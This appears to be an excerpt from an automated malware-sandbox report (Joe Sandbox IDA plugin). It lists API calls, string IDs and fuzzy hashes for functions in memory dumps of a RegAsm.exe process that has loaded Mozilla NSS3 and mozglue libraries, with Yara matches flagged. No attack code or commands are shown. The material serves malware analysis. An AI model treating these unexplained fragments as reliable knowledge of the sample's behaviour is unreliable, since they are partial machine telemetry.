                                                                                • API String ID: 3805649505-2608361144
                                                                                • Opcode ID: b9755e06167966589afcb3eb87fdae804f22e792c46e924866ace846bee09a54
                                                                                • Instruction ID: 7148d33a0db2c644656519fb595ee6280355530b9f27212a016b8f7ee0c7cc95
                                                                                • Opcode Fuzzy Hash: b9755e06167966589afcb3eb87fdae804f22e792c46e924866ace846bee09a54
                                                                                • Instruction Fuzzy Hash: 5B51E271A047118FD328CF68C29461ABBE1EB99718F15493EE599C7B85D730A800CFE1
                                                                                APIs
                                                                                  • Part of subcall function 6C7B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7F3EBD,6C7F3EBD,00000000), ref: 6C7B42A9
                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C80B127), ref: 6C80B463
                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C80B4C9
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C80B4E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _getpidstrlenstrncmptolower
                                                                                • String ID: pid:
                                                                                • API String ID: 1720406129-3403741246
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C866D36
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C866D2F
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C866D20
                                                                                • database corruption, xrefs: 6C866D2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                APIs
                                                                                  • Part of subcall function 6C99CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C99CC7B), ref: 6C99CD7A
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CD8E
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CDA5
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CDB8
                                                                                • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C99CCB5
                                                                                • memcpy.VCRUNTIME140(6CA314F4,6CA302AC,00000090), ref: 6C99CCD3
                                                                                • memcpy.VCRUNTIME140(6CA31588,6CA302AC,00000090), ref: 6C99CD2B
                                                                                  • Part of subcall function 6C8B9AC0: socket.WSOCK32(?,00000017,6C8B99BE), ref: 6C8B9AE6
                                                                                  • Part of subcall function 6C8B9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8B99BE), ref: 6C8B9AFC
                                                                                  • Part of subcall function 6C8C0590: closesocket.WSOCK32(6C8B9A8F,?,?,6C8B9A8F,00000000), ref: 6C8C0597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                • String ID: Ipv6_to_Ipv4 layer
                                                                                • API String ID: 1231378898-412307543
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                • HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                • wsprintfW.USER32 ref: 00410CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                • String ID: %hs
                                                                                • API String ID: 659108358-2783943728
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C800CD5
                                                                                  • Part of subcall function 6C7EF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EF9A7
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C800D40
                                                                                • free.MOZGLUE ref: 6C800DCB
                                                                                  • Part of subcall function 6C7D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7D5EDB
                                                                                  • Part of subcall function 6C7D5E90: memset.VCRUNTIME140(6C817765,000000E5,55CCCCCC), ref: 6C7D5F27
                                                                                  • Part of subcall function 6C7D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7D5FB2
                                                                                • free.MOZGLUE ref: 6C800DDD
                                                                                • free.MOZGLUE ref: 6C800DF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                • String ID:
                                                                                • API String ID: 4069420150-0
                                                                                APIs
                                                                                • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CDA4
                                                                                  • Part of subcall function 6C7CCA10: malloc.MOZGLUE(?), ref: 6C7CCA26
                                                                                  • Part of subcall function 6C80D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C80CDBA,00100000,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D158
                                                                                  • Part of subcall function 6C80D130: InitializeConditionVariable.KERNEL32(00000098,?,6C80CDBA,00100000,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D177
                                                                                • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CDC4
                                                                                  • Part of subcall function 6C807480: ReleaseSRWLockExclusive.KERNEL32(?,6C8115FC,?,?,?,?,6C8115FC,?), ref: 6C8074EB
                                                                                • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CECC
                                                                                  • Part of subcall function 6C7CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C7CCAA2
                                                                                  • Part of subcall function 6C7FCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C80CEEA,?,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000), ref: 6C7FCB57
                                                                                  • Part of subcall function 6C7FCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C7FCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C80CEEA,?,?), ref: 6C7FCBAF
                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D058
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                • String ID:
                                                                                • API String ID: 861561044-0
                                                                                APIs
                                                                                • GetTickCount64.KERNEL32 ref: 6C7D5D40
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7D5D67
                                                                                • __aulldiv.LIBCMT ref: 6C7D5DB4
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7D5DED
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 557828605-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFD074,00000000), ref: 6C95AD13
                                                                                • memcmp.VCRUNTIME140(?,?,?), ref: 6C95AD65
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C95AD95
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C95ADC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Item_Util$CopyErrorZfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 2638228310-0
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C8785D2,00000000,?,?), ref: 6C994FFD
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C99500C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9950C8
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9950D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong
                                                                                • String ID:
                                                                                • API String ID: 4101233201-0
                                                                                • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                • Instruction ID: 94f951b57ba4422b4f250cad76e31bfa1ab1bfaf63cf0bf94cd41fcc0cb7cd8d
                                                                                • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                • Instruction Fuzzy Hash: 744185B2A002118BCB18CF18DCD17AAB7E1BF54319B1D466DD84ACB702E775E891CB81
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE002,00000000,?,6C941289,?), ref: 6C942D72
                                                                                  • Part of subcall function 6C943390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C942CA7,E80C76FF,?,6C941289,?), ref: 6C9433E9
                                                                                  • Part of subcall function 6C943390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C94342E
                                                                                • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C941289,?), ref: 6C942D61
                                                                                  • Part of subcall function 6C940B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C940B21
                                                                                  • Part of subcall function 6C940B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C940B64
                                                                                • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C941289,?), ref: 6C942D88
                                                                                • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C941289,?), ref: 6C942DAF
                                                                                  • Part of subcall function 6C8FB8F0: PR_CallOnceWithArg.NSS3(6CA32178,6C8FBCF0,?), ref: 6C8FB915
                                                                                  • Part of subcall function 6C8FB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C8FB933
                                                                                  • Part of subcall function 6C8FB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C8FB9C8
                                                                                  • Part of subcall function 6C8FB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C8FB9E1
                                                                                  • Part of subcall function 6C940A50: SECOID_GetAlgorithmTag_Util.NSS3(6C942A90,E8571076,?,6C942A7C,6C9421F1,?,?,?,00000000,00000000,?,?,6C9421DD,00000000), ref: 6C940A66
                                                                                  • Part of subcall function 6C943310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C942D1E,?,?,?,?,00000000,?,?,?,?,?,6C941289), ref: 6C943348
                                                                                  • Part of subcall function 6C9406F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C942E70,00000000), ref: 6C940701
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                • String ID:
                                                                                • API String ID: 2288138528-0
                                                                                • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction ID: 2271857fa710ce5c295a07298a022c5f5d609da55dadeecea11df4ac0faac3a4
                                                                                • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction Fuzzy Hash: 593106B6900605ABDB009F74EC45BAA3B69BF6521DF144130EC149BB92F731E928C7A2
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8D6C8D
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8D6CA9
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C8D6CC0
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C9F8FE0), ref: 6C8D6CFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                • String ID:
                                                                                • API String ID: 2370200771-0
                                                                                • Opcode ID: 7ccebd769519adeec5ac66be6496b92c2ed8e0948b0bb5b4e13d6bc5f61babc7
                                                                                • Instruction ID: 6b132089a401cab8e644f8ab90c47a002a61e357fd2b2419af06c9a73457c90a
                                                                                • Opcode Fuzzy Hash: 7ccebd769519adeec5ac66be6496b92c2ed8e0948b0bb5b4e13d6bc5f61babc7
                                                                                • Instruction Fuzzy Hash: 8F31C0B1A0021A9FEB18CF65D981ABFBBF5EF59248F11482DD905D7710EB31E905CBA0
                                                                                APIs
                                                                                • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7F82BC,?,?), ref: 6C7F649B
                                                                                  • Part of subcall function 6C7CCA10: malloc.MOZGLUE(?), ref: 6C7CCA26
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F64A9
                                                                                  • Part of subcall function 6C7EFA80: GetCurrentThreadId.KERNEL32 ref: 6C7EFA8D
                                                                                  • Part of subcall function 6C7EFA80: AcquireSRWLockExclusive.KERNEL32(6C83F448), ref: 6C7EFA99
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F653F
                                                                                • free.MOZGLUE(?), ref: 6C7F655A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                • String ID:
                                                                                • API String ID: 3596744550-0
                                                                                • Opcode ID: 9e3e5693ff2ea886477edc7cb14921db356fd051c6d829dcae67a737cd3da2de
                                                                                • Instruction ID: ff2f1e5b6e50452d77b211a6d76f9596af711ecb7668f14158050cec8ad96e8a
                                                                                • Opcode Fuzzy Hash: 9e3e5693ff2ea886477edc7cb14921db356fd051c6d829dcae67a737cd3da2de
                                                                                • Instruction Fuzzy Hash: 6A3161B5A043159FD700DF14D98469ABBE4FF89318F10482DE85A97741DB34EA19CBD2
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1158113254-0
                                                                                • Opcode ID: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
                                                                                • Instruction ID: f1fda809e5c24f865e8d8af3438d5cd6a3e4cc09553546deba9be0eb83488091
                                                                                • Opcode Fuzzy Hash: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
                                                                                • Instruction Fuzzy Hash: 4E21D771600605AFCB18EFA1D9C1EFBB7ACEF18314B10853FE116D65A1DB38E985C658
                                                                                APIs
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946E36
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C946E57
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946E7D
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946EAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: IntervalMilliseconds$ErrorValue
                                                                                • String ID:
                                                                                • API String ID: 3163584228-0
                                                                                • Opcode ID: fe0be01f31d3209102ee46dca54632605fe4093e9bd08e1dcc33ea80c145191e
                                                                                • Instruction ID: a85c3113ee9a90a4de7020ad4e7bf5d65da90704504bae7cb1b07143103c3a71
                                                                                • Opcode Fuzzy Hash: fe0be01f31d3209102ee46dca54632605fe4093e9bd08e1dcc33ea80c145191e
                                                                                • Instruction Fuzzy Hash: B731D5B1610612EFDB185F34DC14BA7B7E8AB1131AF14863CD499D6A81E730F868CF81
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041164E
                                                                                • strtok_s.MSVCRT ref: 00411675
                                                                                • StrCmpCA.SHLWAPI(00000000,00426564,00000001,?,?,?,00416DD9), ref: 004116B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • strtok_s.MSVCRT ref: 004116ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 539094379-0
                                                                                • Opcode ID: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
                                                                                • Instruction ID: 94ebce82879aab40b33730a641183e694e8fbbb9ae688793fb06155610798229
                                                                                • Opcode Fuzzy Hash: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
                                                                                • Instruction Fuzzy Hash: 382103B1600605ABCB14DF95D981BEFB3A8EF04315F04423FE106E65A1DB78EA488A68
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C915003
                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C91501C
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C91504B
                                                                                • free.MOZGLUE(?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C915064
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterSectionUnlockValuefree
                                                                                • String ID:
                                                                                • API String ID: 1112172411-0
                                                                                • Opcode ID: 38506daaaf73e7cca9c9c1f7293a08d80e35b02fab62d5db992951f3fa9b28cc
                                                                                • Instruction ID: 76e95c893aa98f36a535ae8c1aaa8d1e05f88c197229bec230d3b03efe4fe315
                                                                                • Opcode Fuzzy Hash: 38506daaaf73e7cca9c9c1f7293a08d80e35b02fab62d5db992951f3fa9b28cc
                                                                                • Instruction Fuzzy Hash: DE3116B0A0960ACFDB04EF68C48556ABBF4FF09308B158569D859D7B00E734E891CB91
                                                                                APIs
                                                                                • PK11_DigestOp.NSS3(?,?,00000004), ref: 6C950C43
                                                                                  • Part of subcall function 6C8FDEF0: TlsGetValue.KERNEL32 ref: 6C8FDF37
                                                                                  • Part of subcall function 6C8FDEF0: EnterCriticalSection.KERNEL32(?), ref: 6C8FDF4B
                                                                                  • Part of subcall function 6C8FDEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C8FE02B
                                                                                  • Part of subcall function 6C8FDEF0: PR_Unlock.NSS3(?), ref: 6C8FE07E
                                                                                • PK11_DigestOp.NSS3(?,?,00000008), ref: 6C950C85
                                                                                • PK11_DigestOp.NSS3(?,?,?), ref: 6C950C9F
                                                                                • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C950CB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                 • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
